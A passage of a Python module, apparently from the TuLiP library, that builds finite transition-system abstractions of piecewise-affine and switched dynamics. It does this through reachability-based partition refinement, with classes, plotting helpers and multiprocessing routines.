# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder(s) nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDERS OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""
Algorithms related to discretization of continuous dynamics.
See Also
========
L{find_controller}
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging
logger = logging.getLogger(__name__)
import os
import warnings
import pprint
from copy import deepcopy
import multiprocessing as mp
import numpy as np
from scipy import sparse as sp
import polytope as pc
from polytope.plot import plot_partition, plot_transition_arrow
from tulip import transys as trs
from tulip.hybrid import LtiSysDyn, PwaSysDyn
from .prop2partition import (PropPreservingPartition,
pwa_partition, part2convex)
from .feasible import is_feasible, solve_feasible
from .plot import plot_ts_on_partition
# inline imports:
#
# inline: import matplotlib.pyplot as plt
debug = False
class AbstractSwitched(object):
"""Abstraction of SwitchedSysDyn, with mode-specific and common info.
Attributes:
- ppp: merged partition, if any
Preserves both propositions and dynamics
- ts: common TS, if any
- ppp2ts: map from C{ppp.regions} to C{ts.states}
- modes: dict of {mode: AbstractPwa}
- ppp2modes: map from C{ppp.regions} to C{modes[mode].ppp.regions}
of the form:
{mode: list}
where C{list} has same indices as C{ppp.regions} and
elements in each C{list} are indices of regions in
each C{modes[mode].ppp.regions}.
type: dict
Each partition corresponds to some mode.
(for switched systems)
In each mode a L{PwaSysDyn} is active.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
modes=None, ppp2modes=None
):
if modes is None:
modes = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.modes = modes
self.ppp2modes = ppp2modes
def __str__(self):
s = 'Abstraction of switched system\n'
s += str('common PPP:\n') + str(self.ppp)
s += str('common ts:\n') + str(self.ts)
for mode, ab in self.modes.items():
s += 'mode: ' + str(mode)
s += ', with abstraction:\n' + str(ab)
return s
def ppp2pwa(self, mode, i):
"""Return original C{Region} containing C{Region} C{i} in C{mode}.
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, region)} of:
- index C{j} of C{Region} and
- C{Region} object
in C{modes[mode].ppp.regions}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2pwa(region_idx)
def ppp2sys(self, mode, i):
"""Return index of active PWA subsystem in C{mode},
@param mode: key of C{modes}
@param i: Region index in common partition C{ppp.regions}.
@return: tuple C{(j, subsystem)} of:
- index C{j} of PWA C{subsystem}
- L{LtiSysDyn} object C{subsystem}
"""
region_idx = self.ppp2modes[mode][i]
ab = self.modes[mode]
return ab.ppp2sys(region_idx)
def plot(self, show_ts=False, only_adjacent=False):
"""Plot mode partitions and merged partition, if one exists.
For details see L{AbstractPwa.plot}.
"""
axs = []
color_seed = 0
# merged partition exists ?
if self.ppp is not None:
for mode in self.modes:
env_mode, sys_mode = mode
edge_label = {'env_actions':env_mode,
'sys_actions':sys_mode}
ax = _plot_abstraction(
self, show_ts=False, only_adjacent=False,
color_seed=color_seed
)
plot_ts_on_partition(
self.ppp, self.ts, self.ppp2ts,
edge_label, only_adjacent, ax
)
axs += [ax]
# plot mode partitions
for mode, ab in self.modes.items():
ax = ab.plot(show_ts, only_adjacent, color_seed)
ax.set_title('Abstraction for mode: ' + str(mode))
axs += [ax]
#if isinstance(self.ts, dict):
# for ts in self.ts:
# ax = ts.plot()
# axs += [ax]
return axs
class AbstractPwa(object):
"""Discrete abstraction of PWA dynamics, with attributes:
- ppp: Partition into Regions.
Each Region corresponds to
a discrete state of the abstraction
type: L{PropPreservingPartition}
- ts: Finite transition system abstracting the continuous system.
Each state corresponds to a Region in C{ppp.regions}.
It can be fed into discrete synthesis algorithms.
type: L{FTS}
- ppp2ts: bijection between C{ppp.regions} and C{ts.states}.
Has common indices with C{ppp.regions}.
Elements are states in C{ts.states}.
(usually each state is a str)
type: list of states
- pwa: system dynamics
type: L{PwaSysDyn}
- pwa_ppp: partition preserving both:
- propositions and
- domains of PWA subsystems
Used for non-conservative planning.
If just L{LtiSysDyn}, then the only difference
of C{pwa_ppp} from C{orig_ppp} is convexification.
type: L{PropPreservingPartition}
- orig_ppp: partition preserving only propositions
i.e., agnostic of dynamics
type: L{PropPreservingPartition}
- disc_params: parameters used in discretization that
should be passed to the controller refinement
to ensure consistency
type: dict
If any of the above is not given,
then it is initialized to None.
Notes
=====
1. There could be some redundancy in ppp and ofts,
in that they are both decorated with propositions.
This might be useful to keep each of
them as functional units on their own
(possible to change later).
2. The 'Pwa' in L{AbstractPwa} includes L{LtiSysDyn}
as a special case.
"""
def __init__(
self, ppp=None, ts=None, ppp2ts=None,
pwa=None, pwa_ppp=None, ppp2pwa=None, ppp2sys=None,
orig_ppp=None, ppp2orig=None,
disc_params=None
):
if disc_params is None:
disc_params = dict()
self.ppp = ppp
self.ts = ts
self.ppp2ts = ppp2ts
self.pwa = pwa
self.pwa_ppp = pwa_ppp
self._ppp2pwa = ppp2pwa
self._ppp2sys = ppp2sys
self.orig_ppp = orig_ppp
self._ppp2orig = ppp2orig
# original_regions -> pwa_ppp
# ppp2orig -> ppp2pwa_ppp
# ppp2pwa -> ppp2pwa_sys
self.disc_params = disc_params
def __str__(self):
s = str(self.ppp)
s += str(self.ts)
s += 30 * '-' + '\n'
s += 'Map PPP Regions ---> TS states:\n'
s += self._ppp2other_str(self.ppp2ts) + '\n'
s += 'Map PPP Regions ---> PWA PPP Regions:\n'
s += self._ppp2other_str(self._ppp2pwa) + '\n'
s += 'Map PPP Regions ---> PWA Subsystems:\n'
s += self._ppp2other_str(self._ppp2sys) + '\n'
s += 'Map PPP Regions ---> Original PPP Regions:\n'
s += self._ppp2other_str(self._ppp2orig) + '\n'
s += 'Discretization Options:\n\t'
s += pprint.pformat(self.disc_params) +'\n'
return s
def ts2ppp(self, state):
region_index = self.ppp2ts.index(state)
region = self.ppp[region_index]
return (region_index, region)
def ppp2trans(self, region_index):
"""Return the transition set constraint and active subsystem,
for non-conservative planning.
"""
reg_idx, pwa_region = self.ppp2pwa(region_index)
sys_idx, sys = self.ppp2sys(region_index)
return pwa_region, sys
def ppp2pwa(self, region_index):
"""Return dynamics and predicate-preserving region
and its index for PWA subsystem active in given region.
The returned region is the C{trans_set} used for
non-conservative planning.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.pwa_ppp[i])}
"""
j = self._ppp2pwa[region_index]
pwa_region = self.pwa_ppp[j]
return (j, pwa_region)
def ppp2sys(self, region_index):
"""Return index and PWA subsystem active in indexed region.
Semantics: j-th sub-system is active in i-th Region,
where C{j = ppp2pwa[i]}
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, pwa.list_subsys[i])}
"""
# LtiSysDyn ?
if self._ppp2sys is None:
return (0, self.pwa)
subsystem_idx = self._ppp2sys[region_index]
subsystem = self.pwa.list_subsys[subsystem_idx]
return (subsystem_idx, subsystem)
def ppp2orig(self, region_index):
"""Return index and region of original partition.
The original partition is w/o any dynamics,
not even the PWA domains, only the polytopic predicates.
@param region_index: index in C{ppp.regions}.
@rtype: C{(i, orig_ppp.regions[i])}
"""
j = self._ppp2orig[region_index]
orig_region = self.orig_ppp[j]
return (j, orig_region)
def _ppp2other_str(self, ppp2other):
if ppp2other is None:
return ''
s = ''
for i, other in enumerate(ppp2other):
s += '\t\t' + str(i) + ' -> ' + str(other) + '\n'
return s
def _debug_str_(self):
s = str(self.ppp)
s += str(self.ts)
s += '(PWA + Prop)-Preserving Partition'
s += str(self.pwa_ppp)
s += 'Original Prop-Preserving Partition'
s += str(self.orig_ppp)
return s
def plot(self, show_ts=False, only_adjacent=False,
color_seed=None):
"""Plot partition and optionally feasible transitions.
@param show_ts: plot feasible transitions on partition
@type show_ts: bool
@param only_adjacent: plot feasible transitions only
between adjacent regions. This reduces clutter,
but if horizon > 1 and not all horizon used,
then some transitions could be hidden.
@param only_adjacent: bool
"""
ax = _plot_abstraction(self, show_ts, only_adjacent,
color_seed)
return ax
def verify_transitions(self):
logger.info('verifying transitions...')
for from_state, to_state in self.ts.transitions():
i, from_region = self.ts2ppp(from_state)
j, to_region = self.ts2ppp(to_state)
trans_set, sys = self.ppp2trans(i)
params = {'N', 'close_loop', 'use_all_horizon'}
disc_params = {k:v for k,v in self.disc_params.items()
if k in params}
s0 = solve_feasible(from_region, to_region, sys,
trans_set=trans_set, **disc_params)
msg = str(i) + ' ---> ' + str(j)
if not from_region <= s0:
logger.error('incorrect transition: ' + msg)
isect = from_region.intersect(s0)
ratio = isect.volume /from_region.volume
                logger.error('intersection volume: ' + str(100 * ratio) + ' %')
else:
logger.info('correct transition: ' + msg)
def _plot_abstraction(ab, show_ts, only_adjacent, color_seed):
if ab.ppp is None or ab.ts is None:
warnings.warn('Either ppp or ts is None.')
return
if show_ts:
ts = ab.ts
ppp2ts = ab.ppp2ts
else:
ts = None
ppp2ts = None
ax = ab.ppp.plot(
ts, ppp2ts, only_adjacent=only_adjacent,
color_seed=color_seed
)
#ax = self.ts.plot()
return ax
def discretize(
part, ssys, N=10, min_cell_volume=0.1,
closed_loop=True, conservative=False,
max_num_poly=5, use_all_horizon=False,
trans_length=1, remove_trans=False,
abs_tol=1e-7,
plotit=False, save_img=False, cont_props=None,
plot_every=1, init_part_index_list=[]
):
"""Refine the partition and establish transitions
based on reachability analysis.
Reference
=========
U{[NOTM12]
<https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>}
See Also
========
L{prop2partition.pwa_partition}, L{prop2partition.part2convex}
@param part: L{PropPreservingPartition} object
@param ssys: L{LtiSysDyn} or L{PwaSysDyn} object
@param N: horizon length
@param min_cell_volume: the minimum volume of cells in the resulting
partition.
@param closed_loop: boolean indicating whether the `closed loop`
algorithm should be used. default True.
@param conservative: if true, force sequence in reachability analysis
to stay inside starting cell. If false, safety
is ensured by keeping the sequence inside a convexified
version of the original proposition preserving cell.
@param max_num_poly: maximum number of polytopes in a region to use in
reachability analysis.
@param use_all_horizon: in closed loop algorithm: if we should look
for reachability also in less than N steps.
@param trans_length: the number of polytopes allowed to cross in a
transition. a value of 1 checks transitions
only between neighbors, a value of 2 checks
neighbors of neighbors and so on.
@param remove_trans: if True, remove found transitions between
non-neighbors.
@param abs_tol: maximum volume for an "empty" polytope
@param plotit: plot partitioning as it evolves
@type plotit: boolean,
default = False
@param save_img: save snapshots of partitioning to PDF files,
requires plotit=True
@type save_img: boolean,
default = False
@param cont_props: continuous propositions to plot
@type cont_props: list of C{Polytope}
@rtype: L{AbstractPwa}
"""
start_time = os.times()[0]
orig_ppp = part
min_cell_volume = (min_cell_volume /np.finfo(np.double).eps
*np.finfo(np.double).eps)
ispwa = isinstance(ssys, PwaSysDyn)
islti = isinstance(ssys, LtiSysDyn)
if ispwa:
(part, ppp2pwa, part2orig) = pwa_partition(ssys, part)
else:
part2orig = range(len(part))
# Save original polytopes, require them to be convex
if conservative:
orig_list = None
orig = [0]
else:
(part, new2old) = part2convex(part) # convexify
part2orig = [part2orig[i] for i in new2old]
# map new regions to pwa subsystems
if ispwa:
ppp2pwa = [ppp2pwa[i] for i in new2old]
remove_trans = False # already allowed in nonconservative
orig_list = []
for poly in part:
if len(poly) == 0:
orig_list.append(poly.copy())
elif len(poly) == 1:
orig_list.append(poly[0].copy())
else:
raise Exception("discretize: "
"problem in convexification")
orig = list(range(len(orig_list)))
# Cheby radius of disturbance set
# (defined within the loop for pwa systems)
if islti:
if len(ssys.E) > 0:
rd = ssys.Wset.chebR
else:
rd = 0.
# Initialize matrix for pairs to check
IJ = part.adj.copy()
IJ = IJ.todense()
IJ = np.array(IJ)
logger.debug("\n Starting IJ: \n" + str(IJ) )
# next line omitted in discretize_overlap
IJ = reachable_within(trans_length, IJ,
np.array(part.adj.todense()) )
# Initialize output
num_regions = len(part)
transitions = np.zeros(
[num_regions, num_regions],
dtype = int
)
sol = deepcopy(part.regions)
adj = part.adj.copy()
adj = adj.todense()
adj = np.array(adj)
# next 2 lines omitted in discretize_overlap
if ispwa:
subsys_list = list(ppp2pwa)
else:
subsys_list = None
ss = ssys
# init graphics
if plotit:
try:
import matplotlib.pyplot as plt
plt.ion()
fig, (ax1, ax2) = plt.subplots(1, 2)
ax1.axis('scaled')
ax2.axis('scaled')
file_extension = 'pdf'
except:
logger.error('failed to import matplotlib')
plt = None
else:
plt = None
iter_count = 0
# List of how many "new" regions
# have been created for each region
# and a list of original number of neighbors
#num_new_reg = np.zeros(len(orig_list))
#num_orig_neigh = np.sum(adj, axis=1).flatten() - 1
progress = list()
# Do the abstraction
while np.sum(IJ) > 0:
ind = np.nonzero(IJ)
# i,j swapped in discretize_overlap
i = ind[1][0]
j = ind[0][0]
IJ[j, i] = 0
si = sol[i]
sj = sol[j]
si_tmp = deepcopy(si)
sj_tmp = deepcopy(sj)
#num_new_reg[i] += 1
#print(num_new_reg)
if ispwa:
ss = ssys.list_subsys[subsys_list[i]]
if len(ss.E) > 0:
rd, xd = pc.cheby_ball(ss.Wset)
else:
rd = 0.
if conservative:
# Don't use trans_set
trans_set = None
else:
# Use original cell as trans_set
trans_set = orig_list[orig[i]]
S0 = solve_feasible(
si, sj, ss, N, closed_loop,
use_all_horizon, trans_set, max_num_poly
)
msg = '\n Working with partition cells: ' + str(i) + ', ' + str(j)
logger.info(msg)
msg = '\t' + str(i) +' (#polytopes = ' +str(len(si) ) +'), and:\n'
msg += '\t' + str(j) +' (#polytopes = ' +str(len(sj) ) +')\n'
if ispwa:
msg += '\t with active subsystem: '
msg += str(subsys_list[i]) + '\n'
msg += '\t Computed reachable set S0 with volume: '
msg += str(S0.volume) + '\n'
logger.debug(msg)
#logger.debug('si \cap s0')
isect = si.intersect(S0)
vol1 = isect.volume
risect, xi = pc.cheby_ball(isect)
#logger.debug('si \ s0')
diff = si.diff(S0)
vol2 = diff.volume
rdiff, xd = pc.cheby_ball(diff)
# if pc.is_fulldim(pc.Region([isect]).intersect(diff)):
# logging.getLogger('tulip.polytope').setLevel(logging.DEBUG)
# diff = pc.mldivide(si, S0, save=True)
#
# ax = S0.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/s0.pdf')
#
# ax = si.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/si.pdf')
#
# ax = isect.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/isect.pdf')
#
# ax = diff.plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff.pdf')
#
# ax = isect.intersect(diff).plot()
# ax.axis([0.0, 1.0, 0.0, 2.0])
# ax.figure.savefig('./img/diff_cap_isect.pdf')
#
# logger.error('Intersection \cap Difference != \emptyset')
#
# assert(False)
if vol1 <= min_cell_volume:
logger.warning('\t too small: si \cap Pre(sj), '
'so discard intersection')
if vol1 <= min_cell_volume and isect:
logger.warning('\t discarded non-empty intersection: '
'consider reducing min_cell_volume')
if vol2 <= min_cell_volume:
logger.warning('\t too small: si \ Pre(sj), so not reached it')
# We don't want our partitions to be smaller than the disturbance set
# Could be a problem since cheby radius is calculated for smallest
# convex polytope, so if we have a region we might throw away a good
# cell.
if (vol1 > min_cell_volume) and (risect > rd) and \
(vol2 > min_cell_volume) and (rdiff > rd):
# Make sure new areas are Regions and add proposition lists
if len(isect) == 0:
isect = pc.Region([isect], si.props)
else:
isect.props = si.props.copy()
if len(diff) == 0:
diff = pc.Region([diff], si.props)
else:
diff.props = si.props.copy()
# replace si by intersection (single state)
isect_list = pc.separate(isect)
sol[i] = isect_list[0]
# cut difference into connected pieces
difflist = pc.separate(diff)
difflist += isect_list[1:]
n_isect = len(isect_list) -1
num_new = len(difflist)
# add each piece, as a new state
for region in difflist:
sol.append(region)
# keep track of PWA subsystems map to new states
if ispwa:
subsys_list.append(subsys_list[i])
n_cells = len(sol)
new_idx = range(n_cells-1, n_cells-num_new-1, -1)
"""Update transition matrix"""
transitions = np.pad(transitions, (0,num_new), 'constant')
transitions[i, :] = np.zeros(n_cells)
for r in new_idx:
#transitions[:, r] = transitions[:, i]
# All sets reachable from start are reachable from both part's
# except possibly the new part
transitions[i, r] = 0
transitions[j, r] = 0
# sol[j] is reachable from intersection of sol[i] and S0
if i != j:
transitions[j, i] = 1
            # sol[j] is reachable from each piece of S0 \cap sol[i]
#for k in range(n_cells-n_isect-2, n_cells):
# transitions[j, k] = 1
"""Update adjacency matrix"""
old_adj = np.nonzero(adj[i, :])[0]
# reset new adjacencies
adj[i, :] = np.zeros([n_cells -num_new])
adj[:, i] = np.zeros([n_cells -num_new])
adj[i, i] = 1
adj = np.pad(adj, (0, num_new), 'constant')
for r in new_idx:
adj[i, r] = 1
adj[r, i] = 1
adj[r, r] = 1
if not conservative:
orig = np.hstack([orig, orig[i]])
# adjacencies between pieces of isect and diff
for r in new_idx:
for k in new_idx:
                    if r == k:
continue
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
msg = ''
if logger.getEffectiveLevel() <= logging.DEBUG:
msg += '\t\n Adding states ' + str(i) + ' and '
for r in new_idx:
msg += str(r) + ' and '
msg += '\n'
logger.debug(msg)
for k in np.setdiff1d(old_adj, [i,n_cells-1]):
# Every "old" neighbor must be the neighbor
# of at least one of the new
if pc.is_adjacent(sol[i], sol[k]):
adj[i, k] = 1
adj[k, i] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[i, k] = 0
transitions[k, i] = 0
for r in new_idx:
if pc.is_adjacent(sol[r], sol[k]):
adj[r, k] = 1
adj[k, r] = 1
elif remove_trans and (trans_length == 1):
# Actively remove transitions between non-neighbors
transitions[r, k] = 0
transitions[k, r] = 0
"""Update IJ matrix"""
IJ = np.pad(IJ, (0,num_new), 'constant')
adj_k = reachable_within(trans_length, adj, adj)
sym_adj_change(IJ, adj_k, transitions, i)
for r in new_idx:
sym_adj_change(IJ, adj_k, transitions, r)
if logger.getEffectiveLevel() <= logging.DEBUG:
msg = '\n\n Updated adj: \n' + str(adj)
msg += '\n\n Updated trans: \n' + str(transitions)
msg += '\n\n Updated IJ: \n' + str(IJ)
logger.debug(msg)
logger.info('Divided region: ' + str(i) + '\n')
elif vol2 < abs_tol:
logger.info('Found: ' + str(i) + ' ---> ' + str(j) + '\n')
transitions[j,i] = 1
else:
if logger.level <= logging.DEBUG:
msg = '\t Unreachable: ' + str(i) + ' --X--> ' + str(j) + '\n'
msg += '\t\t diff vol: ' + str(vol2) + '\n'
msg += '\t\t intersect vol: ' + str(vol1) + '\n'
logger.debug(msg)
else:
logger.info('\t unreachable\n')
transitions[j,i] = 0
# check to avoid overlapping Regions
if debug:
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
assert(tmp_part.is_partition() )
n_cells = len(sol)
progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2
progress += [progress_ratio]
msg = '\t total # polytopes: ' + str(n_cells) + '\n'
msg += '\t progress ratio: ' + str(progress_ratio) + '\n'
logger.info(msg)
iter_count += 1
# no plotting ?
if not plotit:
continue
if plt is None or plot_partition is None:
continue
if iter_count % plot_every != 0:
continue
tmp_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# plot pair under reachability check
ax2.clear()
si_tmp.plot(ax=ax2, color='green')
sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5)
plot_transition_arrow(si_tmp, sj_tmp, ax2)
S0.plot(ax2, color='none', hatch='/', alpha=0.3)
fig.canvas.draw()
# plot partition
ax1.clear()
plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23)
# plot dynamics
ssys.plot(ax1, show_domain=False)
# plot hatched continuous propositions
part.plot_props(ax1)
fig.canvas.draw()
# scale view based on domain,
# not only the current polytopes si, sj
l,u = part.domain.bounding_box
ax2.set_xlim(l[0,0], u[0,0])
ax2.set_ylim(l[1,0], u[1,0])
if save_img:
fname = 'movie' +str(iter_count).zfill(3)
fname += '.' + file_extension
fig.savefig(fname, dpi=250)
plt.pause(1)
new_part = PropPreservingPartition(
domain=part.domain,
regions=sol, adj=sp.lil_matrix(adj),
prop_regions=part.prop_regions
)
# check completeness of adjacency matrix
if debug:
tmp_part = deepcopy(new_part)
tmp_part.compute_adj()
# Generate transition system and add transitions
ofts = trs.FTS()
adj = sp.lil_matrix(transitions.T)
n = adj.shape[0]
ofts_states = range(n)
ofts.states.add_from(ofts_states)
ofts.transitions.add_adj(adj, ofts_states)
# Decorate TS with state labels
atomic_propositions = set(part.prop_regions)
ofts.atomic_propositions.add_from(atomic_propositions)
for state, region in zip(ofts_states, sol):
state_prop = region.props.copy()
ofts.states.add(state, ap=state_prop)
    if init_part_index_list is not None:
ofts.states.initial.add_from([index for index, state in enumerate(part2orig) if state in init_part_index_list])
param = {
'N':N,
'trans_length':trans_length,
'closed_loop':closed_loop,
'conservative':conservative,
'use_all_horizon':use_all_horizon,
'min_cell_volume':min_cell_volume,
'max_num_poly':max_num_poly
}
ppp2orig = [part2orig[x] for x in orig]
end_time = os.times()[0]
msg = 'Total abstraction time: ' +\
str(end_time - start_time) + '[sec]'
print(msg)
logger.info(msg)
if save_img and plt is not None:
fig, ax = plt.subplots(1, 1)
plt.plot(progress)
ax.set_xlabel('iteration')
ax.set_ylabel('progress ratio')
ax.figure.savefig('progress.pdf')
return AbstractPwa(
ppp=new_part,
ts=ofts,
ppp2ts=ofts_states,
pwa=ssys,
pwa_ppp=part,
ppp2pwa=orig,
ppp2sys=subsys_list,
orig_ppp=orig_ppp,
ppp2orig=ppp2orig,
disc_params=param
)
def reachable_within(trans_length, adj_k, adj):
"""Find cells reachable within trans_length hops.
"""
if trans_length <= 1:
return adj_k
k = 1
while k < trans_length:
adj_k = np.dot(adj_k, adj)
k += 1
adj_k = (adj_k > 0).astype(int)
return adj_k
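# Hedged illustration of reachable_within (not part of the algorithm itself):
# repeated products of the adjacency matrix expose multi-hop reachability.
# For a 3-cell chain 0 - 1 - 2:
#
#   adj = np.array([[1, 1, 0],
#                   [1, 1, 1],
#                   [0, 1, 1]])
#   reachable_within(2, adj.copy(), adj)
#   # -> all entries become 1: every cell reaches every other within 2 hops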
def sym_adj_change(IJ, adj_k, transitions, i):
horizontal = adj_k[i, :] -transitions[i, :] > 0
vertical = adj_k[:, i] -transitions[:, i] > 0
IJ[i, :] = horizontal.astype(int)
IJ[:, i] = vertical.astype(int)
# DEFUNCT until further notice
def discretize_overlap(closed_loop=False, conservative=False):
"""default False.
UNDER DEVELOPMENT; function signature may change without notice.
Calling will result in NotImplementedError.
"""
raise NotImplementedError
#
# if rdiff < abs_tol:
# logger.info("Transition found")
# transitions[i,j] = 1
#
# elif (vol1 > min_cell_volume) & (risect > rd) & \
# (num_new_reg[i] <= num_orig_neigh[i]+1):
#
# # Make sure new cell is Region and add proposition lists
# if len(isect) == 0:
# isect = pc.Region([isect], si.props)
# else:
# isect.props = si.props.copy()
#
# # Add new state
# sol.append(isect)
# size = len(sol)
#
# # Add transitions
# transitions = np.hstack([transitions, np.zeros([size - 1, 1],
# dtype=int) ])
# transitions = np.vstack([transitions, np.zeros([1, size],
# dtype=int) ])
#
# # All sets reachable from orig cell are reachable from both cells
# transitions[size-1,:] = transitions[i,:]
# transitions[size-1,j] = 1 # j is reachable from new cell
#
# # Take care of adjacency
# old_adj = np.nonzero(adj[i,:])[0]
#
# adj = np.hstack([adj, np.zeros([size - 1, 1], dtype=int) ])
# adj = np.vstack([adj, np.zeros([1, size], dtype=int) ])
# adj[i,size-1] = 1
# adj[size-1,i] = 1
# adj[size-1,size-1] = 1
#
# for k in np.setdiff1d(old_adj,[i,size-1]):
# if pc.is_adjacent(sol[size-1],sol[k],overlap=True):
# adj[size-1,k] = 1
# adj[k, size-1] = 1
# else:
# # Actively remove (valid) transitions between non-neighbors
# transitions[size-1,k] = 0
# transitions[k,size-1] = 0
#
# # Assign original proposition cell to new state and update counts
# if not conservative:
# orig = np.hstack([orig, orig[i]])
# print(num_new_reg)
# num_new_reg = np.hstack([num_new_reg, 0])
# num_orig_neigh = np.hstack([num_orig_neigh, np.sum(adj[size-1,:])-1])
#
# logger.info("\n Adding state " + str(size-1) + "\n")
#
# # Just add adjacent cells for checking,
# # unless transition already found
# IJ = np.hstack([IJ, np.zeros([size - 1, 1], dtype=int) ])
# IJ = np.vstack([IJ, np.zeros([1, size], dtype=int) ])
# horiz2 = adj[size-1,:] - transitions[size-1,:] > 0
# verti2 = adj[:,size-1] - transitions[:,size-1] > 0
# IJ[size-1,:] = horiz2.astype(int)
# IJ[:,size-1] = verti2.astype(int)
# else:
# logger.info("No transition found, intersect vol: " + str(vol1) )
# transitions[i,j] = 0
#
# new_part = PropPreservingPartition(
# domain=part.domain,
# regions=sol, adj=np.array([]),
# trans=transitions, prop_regions=part.prop_regions,
# original_regions=orig_list, orig=orig)
# return new_part
def multiproc_discretize(q, mode, ppp, cont_dyn, disc_params):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
print('Abstracting mode: ' + str(mode) + ', on: ' + str(name))
absys = discretize(ppp, cont_dyn, **disc_params)
q.put((mode, absys))
    print('Worker: ' + str(name) + ' finished.')
def multiproc_get_transitions(
q, absys, mode, ssys, params
):
global logger
logger = mp.log_to_stderr()
name = mp.current_process().name
    print('Computing transitions for mode: ' + str(mode) + ', on: ' + str(name))
trans = get_transitions(absys, mode, ssys, **params)
q.put((mode, trans))
    print('Worker: ' + str(name) + ' finished.')
def multiproc_discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Parallel implementation of discretize_switched.
Uses the multiprocessing package.
"""
logger.info('parallel discretize_switched started')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
q = mp.Queue()
mode_args = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
mode_args[mode] = (q, mode, ppp, cont_dyn, disc_params[mode])
jobs = [mp.Process(target=multiproc_discretize, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
# flush before join:
# http://stackoverflow.com/questions/19071529/
abstractions = dict()
for job in jobs:
mode, absys = q.get()
abstractions[mode] = absys
for job in jobs:
job.join()
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
logger.info('Merged partition has: ' + str(n) + ', states')
# find feasible transitions over merged partition
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
mode_args[mode] = (q, merged_abstr, mode, cont_dyn, params)
jobs = [mp.Process(target=multiproc_get_transitions, args=args)
for args in mode_args.values()]
for job in jobs:
job.start()
trans = dict()
for job in jobs:
mode, t = q.get()
trans[mode] = t
# merge the abstractions, creating a common TS
merge_abstractions(merged_abstr, trans,
abstractions, modes, mode_nums)
if plot:
plot_mode_partitions(merged_abstr, show_ts, only_adjacent)
return merged_abstr
def discretize_switched(
ppp, hybrid_sys, disc_params=None,
plot=False, show_ts=False, only_adjacent=True
):
"""Abstract switched dynamics over given partition.
@type ppp: L{PropPreservingPartition}
@param hybrid_sys: dynamics of switching modes
@type hybrid_sys: L{SwitchedSysDyn}
@param disc_params: discretization parameters passed to L{discretize} for
each mode. See L{discretize} for details.
@type disc_params: dict (keyed by mode) of dicts.
@param plot: save partition images
@type plot: bool
@param show_ts, only_adjacent: options for L{AbstractPwa.plot}.
@return: abstracted dynamics,
some attributes are dict keyed by mode
@rtype: L{AbstractSwitched}
"""
if disc_params is None:
disc_params = {'N':1, 'trans_length':1}
logger.info('discretizing hybrid system')
modes = list(hybrid_sys.modes)
mode_nums = hybrid_sys.disc_domain_size
# discretize each abstraction separately
abstractions = dict()
for mode in modes:
logger.debug(30*'-'+'\n')
logger.info('Abstracting mode: ' + str(mode))
cont_dyn = hybrid_sys.dynamics[mode]
absys = discretize(
ppp, cont_dyn,
**disc_params[mode]
)
logger.debug('Mode Abstraction:\n' + str(absys) +'\n')
abstractions[mode] = absys
# merge their domains
(merged_abstr, ap_labeling) = merge_partitions(abstractions)
n = len(merged_abstr.ppp)
logger.info('Merged partition has: ' + str(n) + ', states')
# find feasible transitions over merged partition
trans = dict()
for mode in modes:
cont_dyn = hybrid_sys.dynamics[mode]
params = disc_params[mode]
trans[mode] = get_transitions(
merged_abstr, mode, cont_dyn,
N=params['N'], trans_length=params['trans_length']
)
# merge the abstractions, creating a common TS
